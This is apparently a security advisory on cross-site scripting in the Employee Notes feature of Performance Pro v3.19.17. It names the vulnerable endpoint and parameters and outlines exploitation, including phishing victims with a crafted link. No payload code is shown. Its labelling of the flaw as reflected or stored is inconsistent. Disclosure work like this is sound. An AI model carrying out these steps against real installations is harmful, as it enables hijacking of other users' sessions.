# Reflected XSS - Employee Notes ## Reflected XSS (authenticated) Performance Pro v3.19.17 and earlier is affected by multiple Stored Cross-Site Scripting (XSS) vulnerabilities (Persistent/Type II) via POST requests to: {% hint style="warning" %} /index.php?mode=mNote\&job=update {% endhint %} ### Description The application is vulnerable to multiple instances of stored (persistent) XSS in the Employee Notes functionality. Malicious input provided by an authenticated user is stored server-side and later rendered into the DOM without proper encoding or sanitization. This allows execution of arbitrary JavaScript in the context of any user viewing the affected pages. Vulnerable parameters: * title – Reflected unsanitized on /index.php (Employee Notes title field). * description – Reflected unsanitized on /viewnote.php?id=\ (generated when printing or viewing a note). {% hint style="danger" %} This vulnerability allows attackers to execute malicious scripts, alter the user's interface, and potentially redirect users to malicious sites. {% endhint %} *** ### Exploitation * Inject malicious javascript into either the title or the description of the employee note * Title: * Once the note has been saved, the injected title is now exploitable upon viewing the home page and or when printing the employee notes. * Description: * Once the note has been saved, the injected description is only exploitable when the attacker prints the employee note. That link can then be shared to other authenticated users. * **Send** the crafted URL to a victim via phishing, social engineering, or any other attack vector. * When the victim navigates to the modified URL, the application reflects the malicious input directly into the browser without sufficient sanitization. * **The victim’s browser renders the injected payload** in the error message, allowing arbitrary script execution within the victim's browser. ### Example 1 - Title XSS * Create a new note\ ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2F5RVsJjAT4xSXfaXqM24L%2Fimage.png?alt=media\&token=3d211a24-5d3c-4d39-8622-b047714883ab) * Inject a malicious XSS payload into the title and save\ ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2F2aamV7kw8hBi9rLqzd33%2Fimage.png?alt=media\&token=34068326-6c38-4d34-ad95-6d6235d02f4c) * Click on the malicious title on the Employee Notes page\ ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2FqdraLhWiDra3BqzU3pMe%2Fimage.png?alt=media\&token=b7a60c94-ddc4-4d38-84bc-32e102b736d5)\ ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2FhUoD7f4N4bcNn31pisKc%2Fimage.png?alt=media\&token=124f3f0a-e40a-418d-91b9-9df14a3335e5) ### Example 2 - Description XSS * Create a new note\ ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2Fr8PxV8Prae3xit6wf1pa%2Fimage.png?alt=media\&token=6ea93939-0080-4fc3-9e62-41c76c1770b1) * Inject a malicious XSS payload into the description and save\ ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2F89tXFrtGPLI6n9u2W4Lx%2Fimage.png?alt=media\&token=88f3710e-54e3-4676-bd4c-429aae29587a) * Print the employee note to generate a malicious link\ ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2FvkXRixW1w6yzKAPqkiwm%2Fimage.png?alt=media\&token=127de690-d24e-4721-817c-3f5654a5d5cb) * Click on the malicious description\ ![](https://2946459361-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGyD3p56S2Ma0Q756LEYJ%2Fuploads%2FxK2dwhlzhP6TYkDBc1op%2Fimage.png?alt=media\&token=8fceb3a5-3638-4a97-aeb1-66f4be1c5c02) * *\*It is worth mentioning that on the print page the title is also exploitable and vulnerable to XSS. It is not limited to just the description.*\